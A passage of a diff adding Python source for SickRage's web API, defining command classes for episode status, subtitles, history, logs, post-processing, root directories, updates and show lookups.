Report to Devs!"") + + ep_list = [] + if self.e: + ep_obj = show_obj.getEpisode(self.s, self.e) + if not ep_obj: + return _responds(RESULT_FAILURE, msg=""Episode not found"") + ep_list = [ep_obj] + else: + # get all episode numbers from self, season + ep_list = show_obj.getAllEpisodes(season=self.s) + + def _ep_result(result_code, ep, msg=""""): + return {'season': ep.season, 'episode': ep.episode, 'status': _get_status_strings(ep.status), + 'result': result_type_map[result_code], 'message': msg} + + ep_results = [] + failure = False + start_backlog = False + segments = {} + + sql_l = [] + for ep_obj in ep_list: + with ep_obj.lock: + if self.status == WANTED: + # figure out what episodes are wanted so we can backlog them + if ep_obj.season in segments: + segments[ep_obj.season].append(ep_obj) + else: + segments[ep_obj.season] = [ep_obj] + + # don't let them mess up UN-AIRED episodes + if ep_obj.status == UNAIRED: + if self.e is not None: # setting the status of an un-aired is only considered a failure if we directly wanted this episode, but is ignored on a season request + ep_results.append( + _ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is UN-AIRED"")) + failure = True + continue + + if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS: + ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status to FAILED because failed download handling is disabled"")) + failure = True + continue + + # allow the user to force setting the status for an already downloaded episode + if ep_obj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force: + ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is already marked as DOWNLOADED"")) + failure = True + continue + + ep_obj.status = self.status + sql_l.append(ep_obj.get_sql()) + + if self.status == WANTED: + start_backlog = True + ep_results.append(_ep_result(RESULT_SUCCESS, ep_obj)) + + if len(sql_l) > 0: + my_db = db.DBConnection() + my_db.mass_action(sql_l) + + extra_msg = """" + if start_backlog: + for season, segment in segments.iteritems(): + cur_backlog_queue_item = search_queue.BacklogQueueItem(show_obj, segment) + sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # @UndefinedVariable + + logger.log(u""API :: Starting backlog for "" + show_obj.name + "" season "" + str( + season) + "" because some episodes were set to WANTED"") + + extra_msg = "" Backlog started"" + + if failure: + return _responds(RESULT_FAILURE, ep_results, 'Failed to set all or some status. Check data.' + extra_msg) + else: + return _responds(RESULT_SUCCESS, msg='All status set successfully.' + extra_msg) + + +class CMD_SubtitleSearch(ApiCall): + _help = { + ""desc"": ""Search for an episode subtitles. 
The response might take some time."",
+        ""requiredParameters"": {
+            ""indexerid"": {""desc"": ""Unique ID of a show""},
+            ""season"": {""desc"": ""The season number""},
+            ""episode"": {""desc"": ""The episode number""},
+        },
+        ""optionalParameters"": {
+            ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},
+        }
+    }
+
+    def __init__(self, args, kwargs):
+        # required
+        self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])
+        self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])
+        self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Search for an episode's subtitles """"""
+        show_obj = Show.find(sickbeard.showList, int(self.indexerid))
+        if not show_obj:
+            return _responds(RESULT_FAILURE, msg=""Show not found"")
+
+        # retrieve the episode object and fail if we can't get one
+        ep_obj = show_obj.getEpisode(int(self.s), int(self.e))
+        if isinstance(ep_obj, str):
+            return _responds(RESULT_FAILURE, msg=""Episode not found"")
+
+        # try to download subtitles for that episode
+        previous_subtitles = ep_obj.subtitles
+
+        try:
+            subtitles = ep_obj.download_subtitles()
+        except Exception:
+            return _responds(RESULT_FAILURE, msg='Unable to find subtitles')
+
+        # return the correct json value
+        new_subtitles = frozenset(ep_obj.subtitles).difference(previous_subtitles)
+        if new_subtitles:
+            new_languages = [subtitles.name_from_code(code) for code in new_subtitles]
+            status = 'New subtitles downloaded: %s' % ', '.join(new_languages)
+            response = _responds(RESULT_SUCCESS, msg='New subtitles found')
+        else:
+            status = 'No subtitles downloaded'
+            response = _responds(RESULT_FAILURE, msg='Unable to find subtitles')
+
+        ui.notifications.message('Subtitles Search', status)
+
+        return response
+
+
+class CMD_Exceptions(ApiCall):
+    _help = {
+        ""desc"": ""Get the scene exceptions for all or a given show"",
+        ""optionalParameters"": {
+            ""indexerid"": {""desc"": ""Unique ID of a show""},
+            ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},
+        }
+    }
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", [])
+
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Get the scene exceptions for all or a given show """"""
+        my_db = db.DBConnection(""cache.db"", row_type=""dict"")
+
+        if self.indexerid is None:
+            sql_results = my_db.select(""SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions"")
+            scene_exceptions = {}
+            for row in sql_results:
+                indexerid = row[""indexerid""]
+                if indexerid not in scene_exceptions:
+                    scene_exceptions[indexerid] = []
+                scene_exceptions[indexerid].append(row[""show_name""])
+
+        else:
+            show_obj = Show.find(sickbeard.showList, int(self.indexerid))
+            if not show_obj:
+                return _responds(RESULT_FAILURE, msg=""Show not found"")
+
+            sql_results = my_db.select(
+                ""SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions WHERE indexer_id = ?"",
+                [self.indexerid])
+            scene_exceptions = []
+            for row in sql_results:
+                scene_exceptions.append(row[""show_name""])
+
+        return _responds(RESULT_SUCCESS, scene_exceptions)
+
+
+class CMD_History(ApiCall):
+    _help = {
+        ""desc"": ""Get the downloaded and/or snatched history"",
+        ""optionalParameters"": {
+            ""limit"": {""desc"": ""The maximum number of results to return""},
""type"": {""desc"": ""Only get some entries. No value will returns every type""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", []) + self.type, args = self.check_params(args, kwargs, ""type"", None, False, ""string"", [""downloaded"", ""snatched""]) + self.type = self.type.lower() if isinstance(self.type, str) else '' + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the downloaded and/or snatched history """""" + data = History().get(self.limit, self.type) + results = [] + + for row in data: + status, quality = Quality.splitCompositeStatus(int(row[""action""])) + status = _get_status_strings(status) + + if self.type and not status.lower() == self.type: + continue + + row[""status""] = status + row[""quality""] = get_quality_string(quality) + row[""date""] = _history_date_to_datetime_form(str(row[""date""])) + + del row[""action""] + + _rename_element(row, ""show_id"", ""indexerid"") + row[""resource_path""] = ek(os.path.dirname, row[""resource""]) + row[""resource""] = ek(os.path.basename, row[""resource""]) + + # Add tvdbid for backward compatibility + row['tvdbid'] = row['indexerid'] + results.append(row) + + return _responds(RESULT_SUCCESS, results) + + +class CMD_HistoryClear(ApiCall): + _help = {""desc"": ""Clear the entire history""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Clear the entire history """""" + History().clear() + + return _responds(RESULT_SUCCESS, msg=""History cleared"") + + +class CMD_HistoryTrim(ApiCall): + _help = {""desc"": ""Trim history entries older than 30 days""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Trim history entries older than 30 days """""" + History().trim() + + return _responds(RESULT_SUCCESS, msg='Removed history entries older than 30 days') + + +class CMD_Failed(ApiCall): + _help = { + ""desc"": ""Get the failed downloads"", + ""optionalParameters"": { + ""limit"": {""desc"": ""The maximum number of results to return""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the failed downloads """""" + + my_db = db.DBConnection('failed.db', row_type=""dict"") + + u_limit = min(int(self.limit), 100) + if u_limit == 0: + sql_results = my_db.select(""SELECT * FROM failed"") + else: + sql_results = my_db.select(""SELECT * FROM failed LIMIT ?"", [u_limit]) + + return _responds(RESULT_SUCCESS, sql_results) + + +class CMD_Backlog(ApiCall): + _help = {""desc"": ""Get the backlogged episodes""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the backlogged episodes """""" + + shows = [] + + my_db = db.DBConnection(row_type=""dict"") + for curShow in sickbeard.showList: + + show_eps = [] + + sql_results = my_db.select( + ""SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? 
and paused = 0 ORDER BY season DESC, episode DESC"", + [curShow.indexerid]) + + for curResult in sql_results: + + cur_ep_cat = curShow.getOverview(int(curResult[""status""] or -1)) + if cur_ep_cat and cur_ep_cat in (Overview.WANTED, Overview.QUAL): + show_eps.append(curResult) + + if show_eps: + shows.append({ + ""indexerid"": curShow.indexerid, + ""show_name"": curShow.name, + ""status"": curShow.status, + ""episodes"": show_eps + }) + + return _responds(RESULT_SUCCESS, shows) + + +class CMD_Logs(ApiCall): + _help = { + ""desc"": ""Get the logs"", + ""optionalParameters"": { + ""min_level"": { + ""desc"": + ""The minimum level classification of log entries to return. "" + ""Each level inherits its above levels: debug < info < warning < error"" + }, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.min_level, args = self.check_params(args, kwargs, ""min_level"", ""error"", False, ""string"", + [""error"", ""warning"", ""info"", ""debug""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the logs """""" + # 10 = Debug / 20 = Info / 30 = Warning / 40 = Error + min_level = logger.reverseNames[str(self.min_level).upper()] + + data = [] + if ek(os.path.isfile, logger.logFile): + with io.open(logger.logFile, 'r', encoding='utf-8') as f: + data = f.readlines() + + regex = r""^(\d\d\d\d)\-(\d\d)\-(\d\d)\s*(\d\d)\:(\d\d):(\d\d)\s*([A-Z]+)\s*(.+?)\s*\:\:\s*(.*)$"" + + final_data = [] + + num_lines = 0 + last_line = False + num_to_show = min(50, len(data)) + + for x in reversed(data): + + match = re.match(regex, x) + + if match: + level = match.group(7) + if level not in logger.reverseNames: + last_line = False + continue + + if logger.reverseNames[level] >= min_level: + last_line = True + final_data.append(x.rstrip(""\n"")) + else: + last_line = False + continue + + elif last_line: + final_data.append(""AA"" + x) + + num_lines += 1 + + if num_lines >= num_to_show: + break + + return _responds(RESULT_SUCCESS, final_data) + + +class CMD_PostProcess(ApiCall): + _help = { + ""desc"": ""Manually post-process the files in the download folder"", + ""optionalParameters"": { + ""path"": {""desc"": ""The path to the folder to post-process""}, + ""force_replace"": {""desc"": ""Force already post-processed files to be post-processed again""}, + ""return_data"": {""desc"": ""Returns the result of the post-process""}, + ""process_method"": {""desc"": ""How should valid post-processed files be handled""}, + ""is_priority"": {""desc"": ""Replace the file even if it exists in a higher quality""}, + ""failed"": {""desc"": ""Mark download as failed""}, + ""type"": {""desc"": ""The type of post-process being requested""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.path, args = self.check_params(args, kwargs, ""path"", None, False, ""string"", []) + self.force_replace, args = self.check_params(args, kwargs, ""force_replace"", False, False, ""bool"", []) + self.return_data, args = self.check_params(args, kwargs, ""return_data"", False, False, ""bool"", []) + self.process_method, args = self.check_params(args, kwargs, ""process_method"", False, False, ""string"", + [""copy"", ""symlink"", ""hardlink"", ""move""]) + self.is_priority, args = self.check_params(args, kwargs, ""is_priority"", False, False, ""bool"", []) + self.failed, args = self.check_params(args, kwargs, ""failed"", False, False, ""bool"", []) + self.type, args = self.check_params(args, kwargs, ""type"", ""auto"", None, ""string"", [""auto"", 
""manual""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Manually post-process the files in the download folder """""" + if not self.path and not sickbeard.TV_DOWNLOAD_DIR: + return _responds(RESULT_FAILURE, msg=""You need to provide a path or set TV Download Dir"") + + if not self.path: + self.path = sickbeard.TV_DOWNLOAD_DIR + + if not self.type: + self.type = 'manual' + + data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace, + is_priority=self.is_priority, failed=self.failed, proc_type=self.type) + + if not self.return_data: + data = """" + + return _responds(RESULT_SUCCESS, data=data, msg=""Started post-process for %s"" % self.path) + + +class CMD_SickBeard(ApiCall): + _help = {""desc"": ""Get miscellaneous information about SickRage""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" dGet miscellaneous information about SickRage """""" + data = {""sr_version"": sickbeard.BRANCH, ""api_version"": self.version, + ""api_commands"": sorted(function_mapper.keys())} + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardAddRootDir(ApiCall): + _help = { + ""desc"": ""Add a new root (parent) directory to SickRage"", + ""requiredParameters"": { + ""location"": {""desc"": ""The full path to the new root (parent) directory""}, + }, + ""optionalParameters"": { + ""default"": {""desc"": ""Make this new location the default root (parent) directory""}, + } + } + + def __init__(self, args, kwargs): + # required + self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", []) + # optional + self.default, args = self.check_params(args, kwargs, ""default"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Add a new root (parent) directory to SickRage """""" + + self.location = urllib.unquote_plus(self.location) + location_matched = 0 + index = 0 + + # disallow adding/setting an invalid dir + if not ek(os.path.isdir, self.location): + return _responds(RESULT_FAILURE, msg=""Location is invalid"") + + root_dirs = [] + + if sickbeard.ROOT_DIRS == """": + self.default = 1 + else: + root_dirs = sickbeard.ROOT_DIRS.split('|') + index = int(sickbeard.ROOT_DIRS.split('|')[0]) + root_dirs.pop(0) + # clean up the list - replace %xx escapes by their single-character equivalent + root_dirs = [urllib.unquote_plus(x) for x in root_dirs] + for x in root_dirs: + if x == self.location: + location_matched = 1 + if self.default == 1: + index = root_dirs.index(self.location) + break + + if location_matched == 0: + if self.default == 1: + root_dirs.insert(0, self.location) + else: + root_dirs.append(self.location) + + root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs] + root_dirs_new.insert(0, index) + root_dirs_new = '|'.join(unicode(x) for x in root_dirs_new) + + sickbeard.ROOT_DIRS = root_dirs_new + return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directories updated"") + + +class CMD_SickBeardCheckVersion(ApiCall): + _help = {""desc"": ""Check if a new version of SickRage is available""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + check_version = CheckVersion() + needs_update = check_version.check_for_new_version() + + data = { + ""current_version"": { + ""branch"": 
check_version.get_branch(), + ""commit"": check_version.updater.get_cur_commit_hash(), + ""version"": check_version.updater.get_cur_version(), + }, + ""latest_version"": { + ""branch"": check_version.get_branch(), + ""commit"": check_version.updater.get_newest_commit_hash(), + ""version"": check_version.updater.get_newest_version(), + }, + ""commits_offset"": check_version.updater.get_num_commits_behind(), + ""needs_update"": needs_update, + } + + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardCheckScheduler(ApiCall): + _help = {""desc"": ""Get information about the scheduler""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get information about the scheduler """""" + my_db = db.DBConnection() + sql_results = my_db.select(""SELECT last_backlog FROM info"") + + backlog_paused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable + backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable + next_backlog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING) + + data = {""backlog_is_paused"": int(backlog_paused), ""backlog_is_running"": int(backlog_running), + ""last_backlog"": _ordinal_to_date_form(sql_results[0][""last_backlog""]), + ""next_backlog"": next_backlog} + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardDeleteRootDir(ApiCall): + _help = { + ""desc"": ""Delete a root (parent) directory from SickRage"", + ""requiredParameters"": { + ""location"": {""desc"": ""The full path to the root (parent) directory to remove""}, + } + } + + def __init__(self, args, kwargs): + # required + self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Delete a root (parent) directory from SickRage """""" + if sickbeard.ROOT_DIRS == """": + return _responds(RESULT_FAILURE, _get_root_dirs(), msg=""No root directories detected"") + + new_index = 0 + root_dirs_new = [] + root_dirs = sickbeard.ROOT_DIRS.split('|') + index = int(root_dirs[0]) + root_dirs.pop(0) + # clean up the list - replace %xx escapes by their single-character equivalent + root_dirs = [urllib.unquote_plus(x) for x in root_dirs] + old_root_dir = root_dirs[index] + for curRootDir in root_dirs: + if not curRootDir == self.location: + root_dirs_new.append(curRootDir) + else: + new_index = 0 + + for curIndex, curNewRootDir in enumerate(root_dirs_new): + if curNewRootDir is old_root_dir: + new_index = curIndex + break + + root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new] + if len(root_dirs_new) > 0: + root_dirs_new.insert(0, new_index) + root_dirs_new = ""|"".join(unicode(x) for x in root_dirs_new) + + sickbeard.ROOT_DIRS = root_dirs_new + # what if the root dir was not found? 
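+        # (as written, a location that matched no root dir still falls
+        # through to the success response below with the list unchanged)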
+        return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directory deleted"")
+
+
+class CMD_SickBeardGetDefaults(ApiCall):
+    _help = {""desc"": ""Get SickRage's user default configuration value""}
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Get SickRage's user default configuration value """"""
+
+        any_qualities, best_qualities = _map_quality(sickbeard.QUALITY_DEFAULT)
+
+        data = {""status"": statusStrings[sickbeard.STATUS_DEFAULT].lower(),
+                ""flatten_folders"": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), ""initial"": any_qualities,
+                ""archive"": best_qualities, ""future_show_paused"": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)}
+        return _responds(RESULT_SUCCESS, data)
+
+
+class CMD_SickBeardGetMessages(ApiCall):
+    _help = {""desc"": ""Get all messages""}
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        messages = []
+        for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip):
+            messages.append({""title"": cur_notification.title,
+                             ""message"": cur_notification.message,
+                             ""type"": cur_notification.type})
+        return _responds(RESULT_SUCCESS, messages)
+
+
+class CMD_SickBeardGetRootDirs(ApiCall):
+    _help = {""desc"": ""Get all root (parent) directories""}
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Get all root (parent) directories """"""
+
+        return _responds(RESULT_SUCCESS, _get_root_dirs())
+
+
+class CMD_SickBeardPauseBacklog(ApiCall):
+    _help = {
+        ""desc"": ""Pause or un-pause the backlog search"",
+        ""optionalParameters"": {
+            ""pause"": {""desc"": ""True to pause the backlog search, False to un-pause it""}
+        }
+    }
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", [])
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Pause or un-pause the backlog search """"""
+        if self.pause:
+            sickbeard.searchQueueScheduler.action.pause_backlog()  # @UndefinedVariable
+            return _responds(RESULT_SUCCESS, msg=""Backlog paused"")
+        else:
+            sickbeard.searchQueueScheduler.action.unpause_backlog()  # @UndefinedVariable
+            return _responds(RESULT_SUCCESS, msg=""Backlog un-paused"")
+
+
+class CMD_SickBeardPing(ApiCall):
+    _help = {""desc"": ""Ping SickRage to check if it is running""}
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Ping SickRage to check if it is running """"""
+        if sickbeard.started:
+            return _responds(RESULT_SUCCESS, {""pid"": sickbeard.PID}, ""Pong"")
+        else:
+            return _responds(RESULT_SUCCESS, msg=""Pong"")
+
+
+class CMD_SickBeardRestart(ApiCall):
+    _help = {""desc"": ""Restart SickRage""}
+
+    def __init__(self, args, kwargs):
+        # required
+        # optional
+        # super, missing, help
+        ApiCall.__init__(self, args, kwargs)
+
+    def run(self):
+        """""" Restart SickRage """"""
+        if not Restart.restart(sickbeard.PID):
+            return _responds(RESULT_FAILURE, msg='SickRage can not be restarted')
+
+        return _responds(RESULT_SUCCESS, msg=""SickRage is restarting..."")
+
+
+class CMD_SickBeardSearchIndexers(ApiCall):
+    _help = {
+        ""desc"": ""Search for a show with a given name on all the indexers, in a specific 
language"", + ""optionalParameters"": { + ""name"": {""desc"": ""The name of the show you want to search for""}, + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + } + } + + def __init__(self, args, kwargs): + self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id'] + # required + # optional + self.name, args = self.check_params(args, kwargs, ""name"", None, False, ""string"", []) + self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"", + self.valid_languages.keys()) + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", []) + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Search for a show with a given name on all the indexers, in a specific language """""" + + results = [] + lang_id = self.valid_languages[self.lang] + + if self.name and not self.indexerid: # only name was given + for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]: + indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy() + + if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE: + indexer_api_params['language'] = self.lang + + indexer_api_params['actors'] = False + indexer_api_params['custom_ui'] = classes.AllShowsListUI + + t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params) + + try: + api_data = t[str(self.name).encode()] + except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error): + logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING) + continue + + for curSeries in api_data: + results.append({indexer_ids[_indexer]: int(curSeries['id']), + ""name"": curSeries['seriesname'], + ""first_aired"": curSeries['firstaired'], + ""indexer"": int(_indexer)}) + + return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id}) + + elif self.indexerid: + for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]: + indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy() + + if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE: + indexer_api_params['language'] = self.lang + + indexer_api_params['actors'] = False + + t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params) + + try: + my_show = t[int(self.indexerid)] + except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error): + logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING) + return _responds(RESULT_SUCCESS, {""results"": [], ""langid"": lang_id}) + + if not my_show.data['seriesname']: + logger.log( + u""API :: Found show with indexerid: "" + str( + self.indexerid) + "", however it contained no show name"", logger.DEBUG) + return _responds(RESULT_FAILURE, msg=""Show contains no name, invalid result"") + + # found show + results = [{indexer_ids[_indexer]: int(my_show.data['id']), + ""name"": unicode(my_show.data['seriesname']), + ""first_aired"": my_show.data['firstaired'], + ""indexer"": int(_indexer)}] + break + + return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id}) + else: + return _responds(RESULT_FAILURE, msg=""Either a unique id or name is required!"") + + +class CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers): + _help = { 
+ ""desc"": ""Search for a show with a given name on The TVDB, in a specific language"", + ""optionalParameters"": { + ""name"": {""desc"": ""The name of the show you want to search for""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + } + } + + def __init__(self, args, kwargs): + CMD_SickBeardSearchIndexers.__init__(self, args, kwargs) + self.indexerid, args = self.check_params(args, kwargs, ""tvdbid"", None, False, ""int"", []) + + +class CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers): + """""" + Deprecated, TVRage is no more. + """""" + + _help = { + ""desc"": + ""Search for a show with a given name on TVRage, in a specific language. "" + ""This command should not longer be used, as TVRage was shut down."", + ""optionalParameters"": { + ""name"": {""desc"": ""The name of the show you want to search for""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + } + } + + def __init__(self, args, kwargs): + # Leave this one as APICall so it doesnt try and search anything + # pylint: disable=W0233,W0231 + ApiCall.__init__(self, args, kwargs) + + def run(self): + return _responds(RESULT_FAILURE, msg=""TVRage is no more, invalid result"") + + +class CMD_SickBeardSetDefaults(ApiCall): + _help = { + ""desc"": ""Set SickRage's user default configuration value"", + ""optionalParameters"": { + ""initial"": {""desc"": ""The initial quality of a show""}, + ""archive"": {""desc"": ""The archive quality of a show""}, + ""future_show_paused"": {""desc"": ""True to list paused shows in the coming episode, False otherwise""}, + ""flatten_folders"": {""desc"": ""Flatten sub-folders within the show directory""}, + ""status"": {""desc"": ""Status of missing episodes""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""]) + self.future_show_paused, args = self.check_params(args, kwargs, ""future_show_paused"", None, False, ""bool"", []) + self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", None, False, ""bool"", []) + self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"", + [""wanted"", ""skipped"", ""ignored""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Set SickRage's user default configuration value """""" + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + sickbeard.QUALITY_DEFAULT = Quality.combineQualities(i_quality_id, a_quality_id) + + if self.status: + # convert the string status to a 
int + for status in statusStrings: + if statusStrings[status].lower() == str(self.status).lower(): + self.status = status + break + # this should be obsolete because of the above + if self.status not in statusStrings: + raise ApiError(""Invalid Status"") + # only allow the status options we want + if int(self.status) not in (3, 5, 6, 7): + raise ApiError(""Status Prohibited"") + sickbeard.STATUS_DEFAULT = self.status + + if self.flatten_folders is not None: + sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders) + + if self.future_show_paused is not None: + sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused) + + return _responds(RESULT_SUCCESS, msg=""Saved defaults"") + + +class CMD_SickBeardShutdown(ApiCall): + _help = {""desc"": ""Shutdown SickRage""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Shutdown SickRage """""" + if not Shutdown.stop(sickbeard.PID): + return _responds(RESULT_FAILURE, msg='SickRage can not be shut down') + + return _responds(RESULT_SUCCESS, msg=""SickRage is shutting down..."") + + +class CMD_SickBeardUpdate(ApiCall): + _help = {""desc"": ""Update SickRage to the latest version available""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + check_version = CheckVersion() + + if check_version.check_for_new_version(): + if check_version.run_backup_if_safe(): + check_version.update() + + return _responds(RESULT_SUCCESS, msg=""SickRage is updating ..."") + + return _responds(RESULT_FAILURE, msg=""SickRage could not backup config ..."") + + return _responds(RESULT_FAILURE, msg=""SickRage is already up to date"") + + +class CMD_Show(ApiCall): + _help = { + ""desc"": ""Get detailed information about a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get detailed information about a show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + show_dict = { + ""season_list"": CMD_ShowSeasonList((), {""indexerid"": self.indexerid}).run()[""data""], + ""cache"": CMD_ShowCache((), {""indexerid"": self.indexerid}).run()[""data""] + } + + genre_list = [] + if show_obj.genre: + genre_list_tmp = show_obj.genre.split(""|"") + for genre in genre_list_tmp: + if genre: + genre_list.append(genre) + + 